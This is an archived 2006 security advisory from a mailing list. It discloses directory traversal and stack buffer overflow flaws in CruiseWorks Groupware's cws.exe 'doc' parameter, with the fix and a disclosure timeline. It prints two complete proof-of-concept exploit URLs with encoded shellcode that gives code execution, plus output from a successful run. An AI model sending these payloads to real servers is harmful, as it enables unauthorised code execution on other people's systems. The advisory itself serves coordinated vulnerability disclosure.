Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities
Date: 24 Oct 2006 12:32:58 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities
------------------------------------------------------------------------


SUMMARY

Two vulnerabilities have been found in CruiseWorks. When exploited, the 
vulnerabilities allow an authenticated user to retrieve arbitrary files 
accessible to the web server process and to execute arbitrary code with 
privileges of the IIS IUSR_MACHINE account.

DETAILS

Vulnerable Systems:
 * CruiseWorks Groupware version 1.09c
 * CruiseWorks Groupware version 1.09d

Immune Systems:
 * CruiseWorks Groupware version 1.09e

This advisory discloses two vulnerabilities in CruiseWorks Groupware.
1) CruiseWorks cws.exe "doc" Parameter Directory Traversal
CruiseWorks does not properly validate the "doc" parameter in 
"/scripts/cruise/cws.exe" before using it to retrieve files for display. 
This allows a malicious user to disclose the content of arbitrary files 
accessible to the web server process using directory traversal characters.

2) CruiseWorks cws.exe "doc" Parameter Buffer Overflow
CruiseWorks does not properly validate the "doc" parameter in 
"/scripts/cruise/cws.exe" before using it to construct a path using the 
"sprintf()" function. This allows a malicious user to cause a stack-based 
buffer overflow and to execute code with privileges of the IIS 
IUSR_MACHINE account.

Testing Notes:
The buffer overflow vulnerability exists in cws.exe which is executed by 
IIS or other webserver as an external CGI process when a HTTP request is 
received. By supplying an overly long value to the "doc" parameter, 
cws.exe will crash.

However, it is trickly to observe the buffer overflow since cws.exe will 
crash silently without activating the "Just In Time Debugger", and there 
is no time to manually attach Ollydbg to the cws.exe process before it 
crashes. For more information on how to observe and test the buffer 
overflow, see this  <http://vuln.sg/cruiseworks109info-en.html> page.

Solution:
Upgrade to CruiseWorks version 1.09e or newer, available at:  
<http://www.kynos.co.jp/cruise/cws/cwsdownload_upinfo1_09e.html> 
http://www.kynos.co.jp/cruise/cws/cwsdownload_upinfo1_09e.html

POC Exploit:
The following POC will exploit the vulnerability to create files in the 
"\windows\temp\" or "\winnt\temp\" directory. It has been tested to work 
on English WinXP SP2 and Japanese Win2K SP4.

NOTE: The shellcode will also sound the speaker continuously.

Copy-and-paste this entire request to the browser addressbar after you 
logon to CruiseWorks. Remember to change the IP address

Example Exploit 1 (requires logon):
Note: Exploit 1 uses address of JMP ESI in ntdll.dll to return into the 
shellcode.

http://192.168.1.111/Scripts/cruise/cws.exe?doc=%90%EB%5E%60%8B%5C%24%28
%8B%73%3C%8B%74%33%78%03%F3%8B%7E%20%03%FB%8B%4E%18%56%33%D2%8B
%37%03%74%24%2C%33%DB%33%C0%AC%85%C0%74%09%C1%CB%0C%D1%CB%03
%D8%EB%F0%3B%5C%24%28%74%0B%83%C7%04%42%E2%DC%5E%33%C0%EB%1A
%5E%8B%7E%24%03%7C%24%28%66%8B%04%57%8B%7E%1C%03%7C%24%28%8B
%04%87%01%44%24%28%61%C3%8B%EC%33%C9%B1%C8%2B%E1%B1%30%64%8B
%01%8B%40%0C%8B%70%1C%AD%8B%78%08%57%68%33%CA%8A%5B%E8%80%FF
%FF%FF%58%58%33%C9%66%B9%90%01%2B%E1%54%51%FF%D0%8B%F4%03%F0
%C7%06%41%41%41%41%C7%46%04%42%42%42%42%C7%46%08%42%42%42
%42%33%DB%89%5E%0C%33%C9%B1%14%B8%01%01%01%01%01%46%08%51
%57%BB%A5%17%FF%7C%33%C0%B0%FF%C1%E0%10%33%D8%53%E8%33%FF%FF
%FF%58%58%33%DB%59%8B%D4%51%53%53%6A%02%53%53%53%52%FF%D0
%59%E2%CD%57%68%8E%4E%0E%EC%E8%13%FF%FF%FF%58%58%BB%AA%AA
%6C%6C%C1%EB%10%53%68%33%32%2E%64%68%75%73%65%72%54%FF%D0
%8B%F0%56%68%57%A0%B5%BB%E8%EE%FE%FF%FF%58%58%6A%FF%FF%D0%57
%68%B0%49%2D%DB%E8%DD%FE%FF%FF%58%58%33%DB%66%BB%E8%03%53
%FF%D0%EB%D7%57%68%7E%D8%E2%73%E8%C5%FE%FF%FF%58%58%FF%D0
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%63%15%f8%77%41%7C%3E%90%7C

Example Exploit 2 (requires logon):
Note: Exploit 2 uses address of CALL ESI in cws.exe to return into the 
shellcode. It should work on WinXP SP2 systems regardless of language.

http://192.168.1.111/scripts/cruise/cws.exe?doc=%90%EB%5E%60%8B%5C%24%28%8B%73%3C%8B
%74%33%78%03%F3%8B%7E%20%03%FB%8B%4E%18%56%33%D2%8B%37%03%74%24%2C%33%DB
%33%C0%AC%85%C0%74%09%C1%CB%0C%D1%CB%03%D8%EB%F0%3B%5C%24%28%74%0B%83
%C7%04%42%E2%DC%5E%33%C0%EB%1A%5E%8B%7E%24%03%7C%24%28%66%8B%04%57%8B
%7E%1C%03%7C%24%28%8B%04%87%01%44%24%28%61%C3%8B%EC%33%C9%B1%C8%2B%E1
%B1%30%64%8B%01%8B%40%0C%8B%70%1C%AD%8B%78%08%57%68%33%CA%8A%5B%E8%80
%FF%FF%FF%58%58%33%C9%66%B9%90%01%2B%E1%54%51%FF%D0%8B%F4%03%F0%C7%06
%41%41%41%41%C7%46%04%42%42%42%42%C7%46%08%42%42%42%42%33%DB%89%5E
%0C%33%C9%B1%14%B8%01%01%01%01%01%46%08%51%57%BB%A5%17%FF%7C%33
%C0%B0%FF%C1%E0%10%33%D8%53%E8%33%FF%FF%FF%58%58%33%DB%59%8B%D4
%51%53%53%6A%02%53%53%53%52%FF%D0%59%E2%CD%57%68%8E%4E%0E%EC%E8
%13%FF%FF%FF%58%58%BB%AA%AA%6C%6C%C1%EB%10%53%68%33%32%2E%64%68
%75%73%65%72%54%FF%D0%8B%F0%56%68%57%A0%B5%BB%E8%EE%FE%FF%FF%58
%58%6A%FF%FF%D0%57%68%B0%49%2D%DB%E8%DD%FE%FF%FF%58%58%33%DB%66
%BB%E8%03%53%FF%D0%EB%D7%57%68%7E%D8%E2%73%E8%C5%FE%FF%FF%58%58
%FF%D0%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41
%41%41%41%41%41%63%15%f8%77%41%7D%C3%40

Successful exploit will create the following files in the Windows temp 
directory.

E:\WINDOWS\Temp>dir/w
 Volume in drive E has no label.
 Volume Serial Number is CC58-3912

 Directory of E:\WINDOWS\Temp

[.]            [..]           AAAABBBBCCCC   AAAABBBBDDDD   AAAABBBBEEEE
AAAABBBBFFFF   AAAABBBBGGGG   AAAABBBBHHHH   AAAABBBBIIII   AAAABBBBJJJJ
AAAABBBBKKKK   AAAABBBBLLLL   AAAABBBBMMMM   AAAABBBBNNNN   AAAABBBBOOOO
AAAABBBBPPPP   AAAABBBBQQQQ   AAAABBBBRRRR   AAAABBBBSSSS   AAAABBBBTTTT
AAAABBBBUUUU   AAAABBBBVVVV
              20 File(s)              0 bytes
               2 Dir(s)   7,973,191,680 bytes free

Disclosure Timeline:
2006-07-19 - Vulnerability Discovered.
2006-07-20 - Initial Vendor Notification by Email (no reply).
2006-07-21 - Second Vendor Notification by Email (no reply).
2006-07-25 - Third Vendor Notification by Web Form (no reply).
2006-07-26 - Fourth Vendor Notification by Email (no reply).
2006-07-31 - Vulnerability reported to JPCERT/CC.
2006-08-14 - Additional information with updated POC exploit sent to 
JPCERT/CC.
2006-10-24 - Coordinated Public Disclosure.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:vulnpost-remove@vuln.sg> TAN 
Chew Keong.
The original article can be found at:  
<http://vuln.sg/cruiseworks109d-en.html> 
http://vuln.sg/cruiseworks109d-en.html



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] CruiseWorks Directory Traversal and Buffer Overflow Vulnerabilities, SecuriTeam <=
Previous by Date:  [UNIX] dtmail Buffer Overflow, SecuriTeam
Next by Date:  [NEWS] SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES, SecuriTeam
Previous by Thread:  [UNIX] dtmail Buffer Overflow, SecuriTeam
Next by Thread:  [NEWS] SQL Injection Vulnerability in Oracle WWV_FLOW_UTILITIES, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]